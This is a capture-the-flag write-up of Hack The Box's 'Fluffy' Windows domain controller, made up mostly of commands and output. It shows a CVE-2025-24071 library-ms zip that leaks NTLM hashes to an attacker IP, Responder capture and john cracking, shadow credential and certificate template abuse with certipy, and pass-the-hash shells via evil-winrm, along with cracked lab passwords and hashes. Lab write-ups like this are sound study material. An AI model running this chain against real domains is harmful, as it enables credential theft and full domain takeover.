❯ sudo nmap -sC -sV -vv 10.10.11.69 -oN fluffy-output Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-14 12:01 +0545 NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 12:01 Completed NSE at 12:01, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:01 Completed NSE at 12:01, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:01 Completed NSE at 12:01, 0.00s elapsed Initiating Ping Scan at 12:01 Scanning 10.10.11.69 [4 ports] Completed Ping Scan at 12:01, 0.33s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 12:01 Completed Parallel DNS resolution of 1 host. at 12:01, 0.01s elapsed Initiating SYN Stealth Scan at 12:01 Scanning 10.10.11.69 [1000 ports] Discovered open port 53/tcp on 10.10.11.69 Discovered open port 445/tcp on 10.10.11.69 Discovered open port 139/tcp on 10.10.11.69 Discovered open port 88/tcp on 10.10.11.69 Discovered open port 389/tcp on 10.10.11.69 Discovered open port 593/tcp on 10.10.11.69 Discovered open port 636/tcp on 10.10.11.69 Discovered open port 3269/tcp on 10.10.11.69 Discovered open port 464/tcp on 10.10.11.69 Discovered open port 3268/tcp on 10.10.11.69
Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-14 13:16:36Z) 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-14T13:18:03+00:00; +6h59m59s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-04-17T16:04:17 | Not valid after: 2026-04-17T16:04:17 | MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880 | SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC IT Disk NETLOGON Disk Logon server share SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jun 14 18:59:51 2025 .. D 0 Sat Jun 14 18:59:51 2025 a.library-ms A 365 Sat Jun 14 19:07:59 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 20:53:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 20:49:05 2025 KeePass-2.58 D 0 Fri Apr 18 20:53:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 20:48:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 20:16:07 2025
5842943 blocks of size 4096. 2073893 blocks available smb: \>
Since other are executables Only downloaded Upgrade_Notice.pdf and a.library-ms.
NSFOCUS CERT has detected that Microsoft recently released a security update to address a critical spoofing vulnerability in Windows File Explorer, identified as **CVE-2025-24071**. This vulnerability has a CVSS score of 7.5, indicating its severity. The issue arises from the implicit trust and automatic file parsing behavior of `.library-ms` files in Windows Explorer. An unauthenticated attacker can exploit this vulnerability by constructing RAR/ZIP files containing a malicious SMB path. Upon decompression, this triggers an SMB authentication request, potentially exposing the user's NTLM hash. PoC (Proof of Concept) exploits for this vulnerability are now publicly available, making it a current threat. Affected users are strongly advised to apply the patch immediately to mitigate the risk.
Windows File Explorer Spoofing Vulnerability (CVE-2025-24071) by ThemeHackers
Creating exploit with filename: evil.library-ms.library-ms Target IP: 10.10.14.65
Generating library file... ✓ Library file created successfully
Creating ZIP archive... ✓ ZIP file created successfully
Cleaning up temporary files... ✓ Cleanup completed
Process completed successfully! Output file: exploit.zip Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.
❯ ls env exploit.py exploit.zip hi.txt LICENSE README.md requirements.txt
Running Responder Simultaneosly in Another Tab to get NTML Hash
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON]
Try "help" to get a list of possible commands. smb: \> put exploit.zip putting file exploit.zip as \exploit.zip (0.3 kb/s) (average 0.3 kb/s) smb: \> dir . D 0 Sat Jun 14 19:41:52 2025 .. D 0 Sat Jun 14 19:41:52 2025 a.library-ms A 365 Sat Jun 14 19:07:59 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 20:53:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 20:49:05 2025 exploit.zip A 338 Sat Jun 14 19:41:52 2025 hi.txt A 0 Sat Jun 14 19:28:39 2025 KeePass-2.58 D 0 Fri Apr 18 20:53:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 20:48:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 20:16:07 2025
5842943 blocks of size 4096. 2073089 blocks available smb: \>
❯ john hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/htb-ac-1518820/.john Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status prometheusx-303 (p.agila) 1g 0:00:00:01 DONE (2025-06-14 02:06) 0.5263g/s 2377Kp/s 2377Kc/s 2377KC/s proquis..programmercomputer Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
We got the password for p.agila which is prometheusx-303.
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: fluffy.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Connecting to LDAP server: dc01.fluffy.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.fluffy.htb INFO: Found 10 users INFO: Found 54 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.fluffy.htb ERROR: Unhandled exception in computer DC01.fluffy.htb processing: The NETBIOS connection with the remote host timed out. INFO: Traceback (most recent call last): File "/home/at0m/Hentai/HTB/fluffy/pywhisker/env/lib/python3.12/site-packages/impacket/nmb.py", line 986, in non_polling_read received = self._sock.recv(bytes_left) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ <SNIP> impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 41S INFO: Compressing output into 20250616202152_bloodhound.zip
Messy but we seem to have gotten something in .zip.
BloodHound GUI
Follow Github Instructions then go to site login and upload the zip file 20250616202152_bloodhound.zip
P.agilla is member of Service Account Manager.
Service Account Manager has Generic All (This permission allows the user or group to take full control over the target object (usually a user or computer account)) relationship to Service Accounts.
And Service Accounts has GenericWrite(With GenericWrite, you can change some parts of the account—like adding it to a group or changing some attributes, but you can’t fully control or take over the account like with GenericAll.) to 3 Accounts I chose WINRM_SVC in that.
Now Finally this is the whole Map.
Summary
The user p.agila is member of SERVICE ACCOUNT MANAGERS and this group has GenericAll to the SERVICE ACCOUNTS group and then SERVICE ACCOUNTS has GenericWrite relationship to ca_svc, ldap_svc and winrm_svc accounts. With the GenericAll relationship we can directly modify the group members so we can add p.agila to SERVICE ACCOUNTS and after that we can do a Shadow Credential attack to any of the previous mentioned accounts.
Adding P.Agilla to Service Accounts.
1
❯ net rpc group addmem "SERVICE ACCOUNTS""p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
Shadow Credentials
Pass the Certificate
Reference: Password Attacks
Making X.509 certificate to obtain TGT and NT Hash.
Using pywhisker.py to add p.agila to the access control list (ACL) of winrm_svc
[*] Searching for the target account [*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: 18e8482b-97cd-fe5d-cb29-5a6e833846a6 [*] Updating the msDS-KeyCredentialLink attribute of winrm_svc [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] Converting PEM -> PFX with cryptography: RsWeZjev.pfx [+] PFX exportiert nach: RsWeZjev.pfx [i] Passwort für PFX: 4QdYa1JOlN65ml8sJJyu [+] Saved PFX (#PKCS12) certificate & key at path: RsWeZjev.pfx [*] Must be used with password: 4QdYa1JOlN65ml8sJJyu [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
We got RsWeZjev.pfx and key 4QdYa1JOlN65ml8sJJyu to generate TGT using PKINITTools .
A .pfx file (also known as PKCS#12 or Personal Information Exchange format) is a binary format that bundles a certificate and its corresponding private key — often used to authenticate a user or machine.
1 2 3
❯ ls __init__.py RsWeZjev_cert.pem RsWeZjev_priv.pem pywhisker.py RsWeZjev.pfx
PKINITTools
We can now perform a Pass-the-Certificate attack to obtain a TGT as winrm_svc.
2025-06-16 21:45:23,832 minikerberos INFO Loading certificate and key from file INFO:minikerberos:Loading certificate and key from file 2025-06-16 21:45:23,922 minikerberos INFO Requesting TGT INFO:minikerberos:Requesting TGT Traceback (most recent call last): File "/home/at0m/Hentai/HTB/fluffy/PKINITtools/gettgtpkinit.py", line 349, in <module> main() File "/home/at0m/Hentai/HTB/fluffy/PKINITtools/gettgtpkinit.py", line 345, in main amain(args) File "/home/at0m/Hentai/HTB/fluffy/PKINITtools/gettgtpkinit.py", line 315, in amain res = sock.sendrecv(req) ^^^^^^^^^^^^^^^^^^ File "/home/at0m/Hentai/HTB/fluffy/pywhisker/env/lib/python3.12/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv raise KerberosError(krb_message) minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"
Note: Kerberos is very sensitive to time differences — the default tolerance is usually 5 minutes. If your system is ahead or behind the DC by more than that, authentication fails like above.
2025-06-16 23:08:28,509 minikerberos INFO Loading certificate and key from file INFO:minikerberos:Loading certificate and key from file 2025-06-16 23:08:28,635 minikerberos INFO Requesting TGT INFO:minikerberos:Requesting TGT 2025-06-16 23:08:35,164 minikerberos INFO AS-REP encryption key (you might need this later): INFO:minikerberos:AS-REP encryption key (you might need this later): 2025-06-16 23:08:35,164 minikerberos INFO 9d38cd84e881a213f84e1d9dd8b48e1e38f52e35bcd7687de2d72dd229a0a104 INFO:minikerberos:9d38cd84e881a213f84e1d9dd8b48e1e38f52e35bcd7687de2d72dd229a0a104 2025-06-16 23:08:35,206 minikerberos INFO Saved TGT to file INFO:minikerberos:Saved TGT to file
We got the AS-REP encryption key now we can get NT hashes from it to perform Pass The Hash Attack.
1 2 3 4 5
❯ ls getnthash.py gettgtpkinit.py ntlmrelayx requirements.txt gets4uticket.py LICENSE README.md winrm_svc.ccache
/home/at0m/Hentai/HTB/fluffy/pywhisker/env/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache [*] Requesting ticket to self with PAC Recovered NT Hash 33bd09dcd697600edf6b3a7af4875767
We got the NT Hash 33bd09dcd697600edf6b3a7af4875767 now we can perform PTH.
Pass The Hash
1 2 3 4 5 6 7 8 9 10
❯ evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\winrm_svc\Documents>
And We are In.
User Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> dir ../Desktop
[*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for'fluffy-DC01-CA' via RRP [*] Successfully retrieved CA configuration for'fluffy-DC01-CA' [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Saving text output to '20250617053904_Certipy.txt' [*] Wrote text output to '20250617053904_Certipy.txt' [*] Saving JSON output to '20250617053904_Certipy.json' [*] Wrote JSON output to '20250617053904_Certipy.json'
[*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for'fluffy-DC01-CA' via RRP [*] Successfully retrieved CA configuration for'fluffy-DC01-CA' [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Saving text output to '20250617125639_Certipy.txt' [*] Wrote text output to '20250617125639_Certipy.txt' [*] Saving JSON output to '20250617125639_Certipy.json' [*] Wrote JSON output to '20250617125639_Certipy.json'
❯ certipy shadow \ -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \ -dc-ip '10.10.11.69' -account 'ca_svc' \ auto Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID 'fee645ec0bcc4bb6bdfbe51991c0c41b' [*] Adding Key Credential with device ID 'fee645ec0bcc4bb6bdfbe51991c0c41b' to the Key Credentials for'ca_svc' [*] Successfully added Key Credential with device ID 'fee645ec0bcc4bb6bdfbe51991c0c41b' to the Key Credentials for'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'ca_svc@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'ca_svc.ccache' [*] Wrote credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hashfor'ca_svc' [*] Restoring the old Key Credentials for'ca_svc' [*] Successfully restored the old Key Credentials for'ca_svc' [*] NT hashfor'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
1
❯ export KRB5CCNAME=ca_svc.ccache
Step 4: Request a certificate as the “victim” user from any suitable client authentication template (e.g., “User”)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail [*] Requesting certificate via RPC [*] Request ID is 23 [*] Successfully requested certificate [*] Got certificate with UPN 'administrator' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx'
[*] Certificate identities: [*] SAN UPN: 'administrator' [*] Using principal: 'administrator@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hashfor'administrator' [*] Got hashfor'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
Yusss! We go the Hash now we can just perform Pass the Hash to connect.
Root by Pass The Hash
1 2 3 4 5 6 7 8 9 10
❯ evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../ *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
